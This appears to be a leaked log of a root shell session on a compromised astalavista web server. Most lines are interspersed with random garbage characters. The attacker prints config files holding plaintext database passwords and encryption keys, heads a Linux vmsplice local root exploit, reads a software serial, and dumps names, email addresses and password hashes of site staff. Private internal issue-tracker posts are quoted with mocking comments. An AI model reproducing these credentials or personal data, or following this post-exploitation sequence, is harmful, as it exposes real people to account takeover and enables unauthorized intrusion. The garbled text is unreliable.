-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
+ y5 R! m: r: x# _7 \lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html( \& {1 M1 W2 U# E" Z' T5 D
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
% ~* Y2 j8 p! n1 v. N% V9 Q5 F6 U  Z) p/ J+ {
sh-3.2# cd auth/9 v" q. l6 t9 k8 K; y
sh-3.2# ls -la
1 o" i& R9 ^% Htotal 28$ J6 E' U# m, b% ~, {3 t0 k! X
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .$ v2 U+ T2 U+ D' \$ {% U7 P
drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..3 g  y% P+ `' ]% M
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
1 Q7 e/ ]+ K1 [4 j) V* h2 Y$ R-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php* B: z+ \% ?! w  S+ a- N1 @
-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
$ L( l2 a& J) q3 q-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting/ L( q3 s8 ]- Q* Y' n
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd# K! L! W! Z6 {2 I" o/ Q

) B! q3 H6 A6 R0 ^sh-3.2# cat hackercontest.config.inc.php
. K. Q" K5 \# O* Y9 k3 D* o* ?/ v<?PHP
) l' Z1 e6 o: Z; G: E* [4 B// Variabeln f?r Verbindung zur Datenbank //, Q/ G3 x& Q5 o5 B* t2 o$ }
$conxHost = ‘localhost’;                       // MySQL hostname
* [" o4 c! H' }. v4 @$conxUser = ‘hackercontest’;                                       // MySQL user
; U' E" u  R% q4 n- v9 f$conxPassword = ‘K6m@7dUc’;                    // MySQL password) C+ m4 |& o% R6 F9 N3 {
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
0 ^6 g# G* C9 q$ \4 m1 I& b?>' j" Y5 u# C" u1 x, g" H0 a
sh-3.2# cat hosting.config.inc.php- ?+ m3 T' E- h/ d% j# S! _
<?PHP% R6 `0 g" O( |4 U5 C: k  P' e$ z" r6 h
// Variabeln f?r Verbindung zur Datenbank //! {. Z* v' n# w* ~, o$ a. B
$conxHost = ‘localhost’;                       // MySQL hostname
+ y. a9 r' i; H; X9 i) U! L4 M# m$conxUser = ‘hostinguser’;                                 // MySQL user
) Y5 P% Y- V4 ]! h$conxPassword = ‘cXvB3981′;                    // MySQL password5 h: H, f, \' s: s4 x
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish; ]6 Q2 _7 _' Z0 D( ^
?>
7 U3 d/ z2 G" O0 g" |$ F6 G9 f' w$ O" t; }
sh-3.2# cd ..
3 x6 y$ T& V7 h: a/ Z& C6 f1 Msh-3.2# cd com
+ `# s# O$ q7 @; P9 Zsh-3.2# ls -la
# `$ {+ \8 B2 w; s( b) x( z: Ytotal 141208
+ m+ M4 U: M8 b4 L& Z5 odrwx–x–x 10 com  com       4096 Apr 28 12:40 .
$ _! N$ B6 a0 G8 v2 J5 b5 qdrwxr-xr-x 14 root root      4096 Mar 11 17:56 ..( v4 m8 h& Z  |
drwx——  2 com  com       4096 Jun  4 04:04 backups
0 [/ }. O  x4 u. x2 E* b-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql9 d7 |- p$ G; V* G7 H
drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
0 Q  N. o3 a! [+ [( t-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history6 h9 `  n8 j3 E7 R2 s- v7 G+ d1 r7 B1 H
-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout3 d3 }5 H5 e" W- \* {5 K
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile7 ?) d! x) o' h
-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc6 I# F0 I1 I) r+ S6 v+ m7 G
drwx–x–x  3 com  com       4096 Jan 29  2008 domains5 K  q, l/ H9 q2 F/ C" z
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
0 S5 U. j7 Y$ t2 }$ Idrwxrwx—  3 com  mail      4096 Jan  6 19:24 imap* ?. S$ J: Y- Y- y/ R0 r
-rw——-  1 com  com         69 Nov 18  2008 .lesshst
2 b. G5 ~: u/ R7 |drwx——  2 com  com       4096 Sep 24  2007 mail) c9 J3 F. `& ^# m& u) J% l. j
-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history
3 h7 p8 ?4 ~4 C" H$ D& [, j7 [drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp+ O  U' @; `& g
lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
% ?2 R& v  H2 g9 H5 [& L" m' r6 d. J8 M- g-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
" @" s7 R( ]' O; ^7 `  s  |# Ndrwx——  2 com  com       4096 Aug 26  2008 .ssh
+ V0 N; y0 R, w  N-rwx——  1 com  com       8515 Feb 10  2008 t  W; M  E- ^# w$ s: M' v
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c' {# M* ]& q1 O% s1 n2 m( c1 S
drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
" X3 L+ S# W% H  q-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
. K( c) H3 W: E. M# ~6 B-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql6 `8 t& u8 V8 w( u; R, @' ]1 @
-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo* q5 W4 ^, O# ^% ~4 r
-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc# ~' a6 X9 v. `0 K8 I; {

* D1 L% Q' m) R( {. P, ]0 j# Ash-3.2# head t.c! H* s+ u8 O0 }& ^- b( f
/*
8 l) x$ q' ^0 }+ M% E2 |$ r6 D* jessica_biel_naked_in_my_bed.c: @& N3 @$ m' Z' T
*/ e8 U& D  n1 n( R: w
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.$ z; @! S( _/ ?3 @( D
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.2 ^1 C  t( d% r& B0 y! H8 K) D
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
; [/ m- A. l, h1 e*
& S7 E, A" y& S* {* Linux vmsplice Local Root Exploit2 E' W) }' c  n* r" D  b- I" n6 ]
* By qaaz8 |5 P8 Y* k* S
*
% R& t. e- F! Y0 j8 h/ [; V$ W% B( R
sh-3.2# cd /$ r9 l7 U  M3 L! r# @- c
sh-3.2# ls -la" ^2 ]' C( y( G9 v- N" z0 H
total 3606 y. W. t4 J) ], {
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
2 B7 X/ G4 J- |* ]; |. pdrwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
+ d* `# U( B, @9 ?2 f-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
% O" ~% G4 a- ?) B% e; P9 ^-rw——-   1 root root  10240 Jun  3 02:39 aquota.user
0 {+ o2 `% k9 f7 M. k! E' L) \& g-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db* [- Y3 |& D" x
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck0 I6 t; K! X. x5 q8 e6 G8 K
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel* H; t" \6 J, p  P
drwxr-xr-x   3 root root   4096 Dec 29  2007 backup9 }- b& i* W# P! I. b
drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin$ ~) p8 M6 ?- ]4 ?
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot* k9 \! ~. M6 F* Q0 _" \" s  z" l$ [, D
drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
9 v1 R* F# P# D$ vdrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
' j' Z4 Y% U4 ]- F7 ~  jdrwxr-xr-x  14 root root   4096 Mar 11 17:56 home
% \' z0 d! T' \, W: L% {-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf: M4 G/ ~$ l+ h, h. v5 R: @( `
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
& y1 v9 w: n: d  s  T; g8 edrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
' R) K1 ~7 e) f& m1 Idrwx——   2 root root  16384 Sep 11  2007 lost+found
9 A, N% `) ~) y1 l# U% ?0 Y2 ~+ Mdrwxr-xr-x   2 root root   4096 Mar 11 17:56 media$ |6 d) p  F+ s5 ]
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc: D$ _; D4 `. ]
drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
% U- T0 X3 Q0 y9 O% G% W5 P$ L- r-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg
; i( @9 e  o# m4 ^0 Cdrwxr-xr-x   2 root root      0 Jun  3 02:43 net  Z+ l& k1 ^, B. e. A
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
, ?: t9 m1 J- Z6 K. [  Gdr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
9 m: E6 c3 _4 S5 F; Q  x4 G- H' Ldrwxr-x—  15 root root   4096 Jun  4 08:40 root; Q8 p& p& a, K/ p2 [6 K
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin. X! p. K% F! s+ @  T1 }- s* m+ `8 f
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
# Y/ X9 ^- G" n- ^; F( Wdrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv7 G% Y* x, j' w2 m$ J2 e
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
& Z3 _. u" Z  k( e5 Y5 _drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
+ c& U5 M6 b1 rdrwxr-xr-x  16 root root   4096 Jun  2 13:56 usr% V! [3 m$ Y; Y
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var. D: K5 s; Z0 J$ b  D

0 u3 Q# g5 v, n$ r; L; hsh-3.2# cd opt# F% c* k5 ?- P- D. j4 q& Q% Z1 v# N
sh-3.2# ls -la% F7 z( F( J, E( [
total 20% ^' d/ T- @0 B0 N6 x$ }
drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
; e+ W, |! \3 ^: E; P( Odrwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
5 u" c0 Q9 t# ]" u5 Ydrwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
) U( w* @( F6 q2 X; j9 x: o5 h; Z9 |5 _' N3 D5 Z& f
sh-3.2# cd lsws/
$ T2 s: Z+ W) a6 r! Ksh-3.2# ls -la# r1 c. V: k/ K4 t
total 108' y/ F( Q5 N9 a. x' Y
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .7 b! s% U! H2 {% i" G4 y
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..9 h4 ]2 B! @+ v, }1 A1 u' J- f
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons& A- `7 p& ?0 Z& w2 P9 }* j
drwxr-xr-x 13 root   root    4096 May 29 15:10 admin2 |9 u2 j, H1 q1 i) _
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate6 a" J' T! h3 k9 ]: h, F* r
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin7 b' T) Q$ @/ \/ S& P8 N' ?
drwx——  4 apache apache  4096 Jun  3 02:43 conf
& `3 w; Z/ O# Y; D5 ddrwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT$ G& |  e0 Z! q" [. w% [
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs* L. J+ ]) g- H1 _  ~3 j
drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
3 T6 n4 [! H( J) J) Q- hdrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
) S9 d( n, y( m0 R3 c: C-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
0 S# b, c1 u+ r1 A) n0 X-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
. t' \3 ~. j  R' S6 p8 N4 C. @-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
4 ]- V) a1 U; e- n  D7 A-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP
6 _8 `2 i* G1 A2 s+ }/ bdrwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
( f! @. `" Z; udrwxr-xr-x  2 root   root    4096 Mar 20  2008 php! \' ^$ x# m! S& Z& y
drwx——  2 apache apache  4096 Mar 20  2008 phpbuild+ }$ q: P7 ^. W# f( U& q
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share6 d+ Q8 k* j7 I4 u0 v
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION
- A7 J# d) t/ c. Y5 e: U- i8 z) Y2 Q4 D, I' u
sh-3.2# cd conf+ D  E, [8 y# E  y8 _+ \) e; Y9 e3 f
sh-3.2# ls -la
  b! T  e2 s& J3 W& }8 Z% vtotal 48
* h$ \3 }$ j$ a8 f/ Gdrwx——  4 apache apache 4096 Jun  3 02:43 ." }9 u" E7 o  g, T
drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
3 n# |- B" d) x8 P' qdrwx——  2 apache apache 4096 Mar 20  2008 cert5 h' t3 C9 A. v* P
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml
# m+ a6 u8 i- ^! I7 u8 c! r, h6 x-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
: l* q" ?7 O" l( ?6 c3 R-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last3 G, N+ `, d3 j; ~3 H
-rw——-  1 apache apache  256 May 29 15:10 license.key6 ^( K1 n, b  }2 u; h9 z# Q( f
-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
3 S, v' T- S) u6 L* p( ]-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties9 I. _/ g2 l7 ?3 O  \4 r7 w+ Y0 @
-rw——-  1 apache apache   20 May 29 15:10 serial.no: h5 K) j  z' t0 L( _7 G
drwx——  2 apache apache 4096 Mar 20  2008 templates$ D2 g5 k! T% y3 A

+ F: G. R; e6 w0 d2 j; Hsh-3.2# cat serial.no% J5 d0 R& p  g1 L7 \) M5 ]
IbDl-oVsO-CKqL-wVRa
  W# E& O) |/ x$ C) J* j& L( D5 Z2 @) `: R6 p; H, ]- |  n
sh-3.2# mysql
# _4 W0 h+ L# S& J* XWelcome to the MySQL monitor.  Commands end with ; or \g.2 Y9 F; K, [' e& @
Your MySQL connection id is 286844
$ ]+ C6 C$ D5 C+ H! U# K% RServer version: 5.0.45-community-log MySQL Community Edition (GPL)
: ^2 X9 Z8 J2 l& k7 n) m2 e: D+ r4 F$ S, C' h) s
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.! R1 j2 L" L  H: a
- {7 `. p# U1 C7 E3 W0 R
mysql> show databases;% `# c1 X2 F) n2 u+ l; t9 }, h
+———————–+
( T" a5 Z3 P0 b+ K! d| Database              |
  G, G9 ^0 G0 {! q+———————–+
8 @& Q9 W* Z# l. W  ^| information_schema    |/ y" R( V% H/ e/ e5 i
| astanet_ads           |9 }2 h5 Y& Q. U, Z! u3 q9 _
| astanet_mailing_lists |# b& t& T) \5 C+ s" j7 D
| astanet_mediawiki     |
/ ?9 H6 S- l& r5 }" t6 Y1 Z| astanet_membersystem  |
) d8 S# C6 F1 d" B0 R9 O| com_contrexx          |
3 O$ [1 t* i$ u" l# d| com_contrexx2         |
8 @* Q/ z1 f7 Q; L: j2 @6 L| com_contrexx2_live    |
6 P7 H  \, s. b7 M. k! c| da_roundcube          |
* p/ G  M7 Z# R! s% r| dolphin               |4 k5 r. M, }8 F' p5 \  a
| ideapool              |
" E3 F* C5 J( b5 x0 c3 `  N| mysql                 |2 |( ?1 p0 m% }6 L8 Y
| test                  |- \8 ?  ]3 r* g
| yourmaster            |
# E0 E2 ~/ b: m4 J6 }+———————–+
3 I, H  m2 p0 y5 D  q14 rows in set (0.00 sec)
& T: T: J- b3 v/ C! x/ f, a. G7 D. h1 b; ~" W6 p) G
mysql> use ideapool
8 q7 w7 E& t, J9 ~Database changed2 i* w) u; G4 E6 X9 ~/ p' \
mysql> show tables;0 {) O& ]6 O  s" ?$ A# O; ]
+———————————–+% M( x. t* d, |5 A( v# K( i
| Tables_in_ideapool                |
3 v4 S9 j* d" R& f% l- u& _+———————————–+
$ G% I) e: [5 X" e& R& \7 B7 ]9 k| eventum_columns_to_display        |+ a( P, z0 U0 h, |  Y
| eventum_custom_field              |
5 B7 }% Y/ S3 z1 s( p2 Y| eventum_custom_field_option       |
% @0 q) n) B1 y; R  e| eventum_custom_filter             |1 {4 i, g! ]/ B) p- Z
| eventum_customer_account_manager  |
2 r$ ^7 W6 B) f& ~% P% u3 q' n| eventum_customer_note             |3 W' O# g, y: q2 P. c1 h; I/ }
| eventum_email_account             |
; H- F. m4 A; F1 [# r" E9 q! {( N| eventum_email_draft               |4 n% ]+ |2 G" n3 f9 c2 C
| eventum_email_draft_recipient     |
) \3 x1 E! \. n, z| eventum_email_response            |! \  _  j3 m& v/ ^: F2 e
| eventum_faq                       |  x, N; b  x1 J  J5 U! q
| eventum_faq_support_level         |
$ N4 z; `2 l* c. N( ^- b| eventum_group                     |
9 H6 C. i- @2 M; S: i| eventum_history_type              |
$ ?/ ~: X$ Q/ i| eventum_irc_notice                |
! j; r1 L8 @- G. @% ]| eventum_issue                     |
( |6 v- k2 u) \  c' m| eventum_issue_association         |4 e: B+ }' g1 i5 ~: L6 E! Y' I
| eventum_issue_attachment          |
8 z0 M1 _* O+ t. _4 ], }0 [% I| eventum_issue_attachment_file     |3 x1 E# j9 s  R9 t# d
| eventum_issue_checkin             |
% i; Q" E/ T7 S" q! ~| eventum_issue_custom_field        |- t. v( J" T+ t$ a& H1 A
| eventum_issue_history             |
3 J& t# l4 R, T9 D# X' [| eventum_issue_quarantine          |4 F  J& v" j7 R3 K
| eventum_issue_requirement         |; B) f8 c5 {- J4 G3 y% a- x
| eventum_issue_user                |+ A& W8 A3 O$ o0 |5 m6 [
| eventum_issue_user_replier        |
" x) }) M8 R9 S; C6 z| eventum_link_filter               |, f& `: R0 v- P& U# n. p! ]
| eventum_mail_queue                |& ~' {; H- H2 q4 J) ^1 v8 v: `
| eventum_mail_queue_log            |. }. _# e7 K/ X! e; B9 g
| eventum_news                      |
/ n4 e+ A6 C( x| eventum_note                      |- L) w' n/ m6 U1 t+ e. s% Z
| eventum_phone_support             |/ v3 [$ N8 t! Z# i5 t# l6 t+ O/ M
| eventum_project                   |
5 A" z+ V$ J) K* ~| eventum_project_category          |
2 I; p. `$ \* p6 {4 G! P9 T| eventum_project_custom_field      |5 k9 l6 ^4 I5 B* ^
| eventum_project_email_response    |
) J6 N* p( r! x+ L/ T  u; Y| eventum_project_field_display     |0 D$ k( ^7 n! c( d
| eventum_project_group             |
8 l# c+ D2 S2 M| eventum_project_link_filter       |
2 l7 S$ g% S) v% u& || eventum_project_news              |% q9 M8 H+ n" ^- Y7 j" h" C
| eventum_project_phone_category    |
% k, b' Q( @+ T% X8 q' O! l% }| eventum_project_priority          |2 q$ S3 {# j' |* P2 |3 O& A! e8 f
| eventum_project_release           |
( h6 @; |9 v7 s4 t0 L| eventum_project_round_robin       |' W: S' \) b! t. C' t4 B, L  c
| eventum_project_status            |  D# q: [: \0 P$ E( b
| eventum_project_status_date       |% f# o7 v: Y" [
| eventum_project_user              |
4 d2 [- n2 f, f; F| eventum_reminder_action           |) `' m. T5 i7 z4 c
| eventum_reminder_action_list      |
% u+ _) |/ c1 q8 [. Q| eventum_reminder_action_type      |" c# M2 {  c* m. q0 }
| eventum_reminder_field            |$ E9 A4 l$ N2 l, ]
| eventum_reminder_history          |4 W6 p3 c! n, m6 H2 Z% I
| eventum_reminder_level            |
/ V/ Y- M0 {6 R8 P4 r8 ~, ~| eventum_reminder_level_condition  |
' a: C& h8 n% w: j| eventum_reminder_operator         |" A, O; p4 q- P
| eventum_reminder_priority         |
; R+ q# s# r/ c! E9 S  w: Y| eventum_reminder_requirement      |
/ A0 l" n0 {1 f3 w$ j6 T9 S7 A| eventum_reminder_triggered_action |
( R% n& I4 N# p$ f- R+ }| eventum_resolution                |
2 F1 {: K( H7 A| eventum_round_robin_user          |- f: |5 J0 R. ?) ?+ Y# N
| eventum_search_profile            |* l/ p& r, ^8 H& H  r  {4 I' p
| eventum_status                    |, r. w" W8 E2 n  L0 f
| eventum_subscription              |6 a  u6 _) L0 x, K6 L
| eventum_subscription_type         |
1 ~* F1 _) ^; P3 W, b| eventum_support_email             |
3 ?( P( ^* C& I- Q/ F+ V$ u( V| eventum_support_email_body        |' ]. }! Q5 s1 a/ F
| eventum_time_tracking             |) }  e% H0 X3 @* c1 ]
| eventum_time_tracking_category    |6 Z4 T, I) v3 {5 e( Z! S& a9 o
| eventum_user                      |# r3 C0 q. b4 I/ _* E
+———————————–+
4 i! }+ A' t; G69 rows in set (0.00 sec)+ [9 _/ I5 s$ g3 v- |: U  ?
+ n' S0 S% r- {5 K' U4 X3 C. T
mysql> describe eventum_user;
' y$ x4 K2 r! U0 O8 Z2 g8 |" J+————————-+——————+——+—–+———————+—————-+
: S' D! r$ w+ }6 q% M  h8 n) w1 W| Field                   | Type             | Null | Key | Default             | Extra          |2 s6 `) b8 \$ i+ n) C. ]8 p
+————————-+——————+——+—–+———————+—————-+
2 H1 I' C" s" z1 t  X) i% E| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |1 ]+ t( a2 u" Q; F$ p$ e- Y) \' b
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |' V) i6 g4 }. ~
| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |% n$ P7 H9 C! v) a7 `; S
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |. ?. d! L& d: C6 g. n# n
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |) H2 R% E: \2 _. e6 ^5 E" ?
| usr_status              | varchar(8)       | NO   |     | active              |                |
% [+ _$ @: Q5 q( R4 ?, u7 g, K| usr_password            | varchar(32)      | NO   |     |                     |                |. ~3 j) c& ^: M- i% R% E& m5 U9 s
| usr_full_name           | varchar(255)     | NO   |     |                     |                |2 R/ k: j8 }7 J4 t% o
| usr_email               | varchar(255)     | NO   | UNI |                     |                |! ]7 f0 ]) P3 V+ Y
| usr_preferences         | longtext         | YES  |     | NULL                |                |4 M- Q5 W8 k- |* ?3 W7 h, G
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |7 p/ d$ w) j' ?: c
| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
; L/ J! s; |" h) P| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
, F; Z" o$ y9 [5 Y4 `$ i5 t+————————-+——————+——+—–+———————+—————-+
0 ?4 f) L! T( B1 x) S' N0 g13 rows in set (0.00 sec)
2 P2 H  I6 k% Q, _$ N; E% e9 ]
( w9 C( b# E7 S& D3 ~' x6 C# |mysql> select usr_full_name,usr_email,usr_password from eventum_user;
6 M8 b0 M2 c1 t  [& q+———————-+——————————-+———————————-+" w1 o4 w( y+ N- p4 L& o
| usr_full_name        | usr_email                     | usr_password                     |3 Y. I9 k9 C! u% ^) [: `
+———————-+——————————-+———————————-+1 N- S# x: [$ a& \3 P% }$ z
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |
9 z( o% z* x$ x" X6 {  E' X| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
& h0 F; P, ~: t& X4 U( e9 V| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |# _3 ]3 F; p) }$ [) j' n, q- r
| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
- l# b  J0 E1 q/ P/ o& e| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |5 v0 n2 K- o+ K. ]/ ^; s
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |1 r9 f: K; h' R2 Q7 F
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
) o4 v9 ^8 l9 g- V, J8 t# t| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
+ V9 ?5 W5 m( k4 q* P" S| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
0 k) E! A6 @( |7 [2 o& A| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
0 K# w3 D& m7 f' q| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
/ C& T+ }3 R0 `; ^| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |. e: v/ b3 r. }0 j
| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |# Y* r: _) b. k9 \2 I) o6 `" L6 F
| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |+ k' }+ R4 z' a9 Z  C8 K# b
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |# D9 K$ j4 L: A# z
+———————-+——————————-+———————————-+7 {5 j  t+ W+ Y" B5 N3 O
15 rows in set (0.00 sec)  D  Y0 d: l1 v! u) O* h
% ]+ q  }! _4 _: n% l. G: X
mysql> select iss_description from eventum_issue where iss_id = 43;
' m2 f) g0 j, V1 ]$ j! E+ L+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
4 N' Z; O3 u) `  ~2 C+ ^| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
8 M  m- \0 I! r  Z' Z6 d/ o& i2 g. {  h|% v8 E! I( ]4 A/ D* ?( P. p
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+" ?) s- \9 `' c, Q7 t! E# m
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be/ S, f7 `; B  ^3 `5 T
connected for 90 mins… 120mins… so what i propose is something like:- j' v9 O* G: @  ^
链接标记[url]http://www.surfthechannel.com/[/url], _1 y- s( t  N8 z& t" {% v
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system5 l0 J; g, i2 B: R
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
# l- F3 N1 B, i) {8 U+ d) y- ]break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off  r* Y  R1 E9 m
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
; z9 c+ `; O$ x, J  ?
! e) ~; e; b! X& NWe could also put advertisement during play on the flash video player itself… extra $$…
  X; K0 `0 g) W& m; D0 l- `- p3 }
. u1 _5 E1 J* u3 V) |0 jBy sykadul |' @! I' ]8 r% w5 u  U
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+- d2 g7 T4 D& F' r7 \
1 row in set (0.00 sec). U0 ?3 p& E  V5 F
: V. y* X, ^" p8 b* ^, C
// Money and extra $$ is all they care about. remember that.
5 V6 L  R' d) z" w9 q  U) ?9 c* I! L( o' K. `, W
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
& W: g3 J, c6 f- G+————————+——————————————————————————————————————————————————————————————————————————————-+* u0 f" {% |/ a0 u: d
| iss_summary            | iss_description                                                                                                                                                                                                                          
5 O6 ~$ X$ {" J* d; Q# h|# N+ C; _; [% R( C0 V* O5 P1 k
+————————+——————————————————————————————————————————————————————————————————————————————-+2 ^+ s0 c# l8 ~* y* q9 Q" f  M; q
| Forum for REAL EXPERTS | Hello,
: F8 E$ m' T8 o  x( H
9 W- y' {! O3 g/ Y( @1 q6 Z5 OIshtus and I,- {  Z8 y9 ~, e* g9 g

- ~; z! m& M- T+ }* wCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
. N2 F9 r5 `* M, C# bONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
! P- u- s  b4 G& w& [/ ^! m, f3 ^- M8 g& t
One example a friend of mine from coresecurity.com!+ D/ u: S- b& L8 {

6 L2 B! z' l0 pWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc.." R" z" b5 B3 n$ m' ^, O2 S$ z! D: g
) ?3 Y8 p/ q: r
|6 P) k" R: F& Y9 A
+————————+——————————————————————————————————————————————————————————————————————————————+
9 s4 }% I* v# c1 row in set (0.00 sec)
1 y% a9 P* q7 l1 a7 |6 |( B6 w
6 ]9 Z0 s: L% ]3 H: v4 V// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…1 L/ B1 V0 C7 O, \+ q

( e6 c$ L' {( U; |mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;' s6 Q3 z1 x* |0 o! p4 P
+——————+———————————————————————————————+( |7 j5 M# x9 {' Y' v  |5 Z
| iss_summary      | iss_description                                                                             |2 x* {) E* r/ y$ Z2 X# A9 }' r
